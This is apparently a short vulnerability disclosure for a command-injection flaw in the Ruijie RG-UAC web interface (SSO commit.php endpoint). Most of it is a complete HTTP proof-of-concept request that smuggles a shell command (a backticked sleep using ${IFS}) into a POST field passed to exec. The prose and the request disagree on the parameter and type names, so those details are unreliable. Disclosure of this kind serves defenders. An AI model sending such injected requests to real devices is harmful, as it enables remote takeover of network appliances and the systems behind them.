Ruijie Network is a professional network manufacturer with a full range of network equipment products and solutions including switches, routers, software, security firewalls, wireless products, storage, etc.
There is a command execution vulnerability in Ruijie RG-UAC. Attackers exploit vulnerabilities to compromise servers.
official:https://www.ruijie.com.cn
version:1.0
url:/view/userAuthentication/SSO/commit.php
Key codes marked
satisfaction variable
($_REQUEST['type']=='adsso_log_test')
At the same time,$_POST ['ad_log_name'] can be controlled and directly substituted into exec, resulting in rce vulnerability
poc:
POST /view/userAuthentication/SSO/commit.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Connection: close
Cookie: PHPSESSID=c545dcdb0474795f9e421b4ac6d46bc9
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
ad_name=`sleep${IFS}10`&type=adsso_test
![图片](https://private-user-images.githubusercontent.com/171104034/338471096-9054613e-f17b-4d12-af8f-c70f97290464.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA4MjA5ODQsIm5iZiI6MTcyMDgyMDY4NCwicGF0aCI6Ii8xNzExMDQwMzQvMzM4NDcxMDk2LTkwNTQ2MTNlLWYxN2ItNGQxMi1hZjhmLWM3MGY5NzI5MDQ2NC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzEyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcxMlQyMTQ0NDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mYzQ4N2M0NzhhMGQ3MGM2ZjI1NWQ5OGUwODZjYzRiNDMwOGRhZmJhNTIxNDE5MjRkMDQyZGY2NGRiNTgzNzAwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.1oMkS4gr_KOiX0UCkwQ1VWx41MHMIvuNLNHYooC9yHQ)